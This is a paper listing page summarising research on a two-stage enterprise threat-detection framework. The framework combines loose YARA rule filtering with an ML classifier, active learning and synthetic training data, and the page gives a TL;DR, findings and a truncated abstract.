Democratizing ML for Enterprise Security: A Self-Sustained Attack Detection Framework
Sadegh Momeni, Ge Zhang, Birkett Huber, Hamza Harkous, Sam Lipton, Benoit Seguin, Yanis Pavlidis

TL;DR
This paper introduces a hybrid ML-based threat detection framework that combines rule-based filtering with active learning and synthetic data generation, enabling scalable, low-maintenance security in enterprise environments.
Contribution
It presents a novel two-stage hybrid detection system with synthetic data and active learning, making ML-based security accessible and sustainable for enterprises.
Findings
Reduces raw log data from 250 billion events to manageable tickets daily.
Improves model precision over time through active learning.
Operates effectively in large-scale, real-world enterprise settings.
Abstract
Despite advancements in machine learning for security, rule-based detection remains prevalent in Security Operations Centers due to the resource intensiveness and skill gap associated with ML solutions. While traditional rule-based methods offer efficiency, their rigidity leads to high false positives or negatives and requires continuous manual maintenance. This paper proposes a novel, two-stage hybrid framework to democratize ML-based threat detection. The first stage employs intentionally loose YARA rules for coarse-grained filtering, optimized for high recall. The second stage utilizes an ML classifier to filter out false positives from the first stage's output. To overcome data scarcity, the system leverages Simula, a seedless synthetic data generation framework, enabling security analysts to create high-quality training datasets without extensive data science expertise or…
Peer Reviews
No public reviews on file for this paper yet. If you reviewed it on a platform where reviews are public (OpenReview, ICLR, NeurIPS, ICML), you can paste yours below so the community can read it here.
Videos
No videos yet. Explain this paper in a talk, walkthrough, or lecture? Add one.
Taxonomy
TopicsNetwork Security and Intrusion Detection · Advanced Malware Detection Techniques · Information and Cyber Security
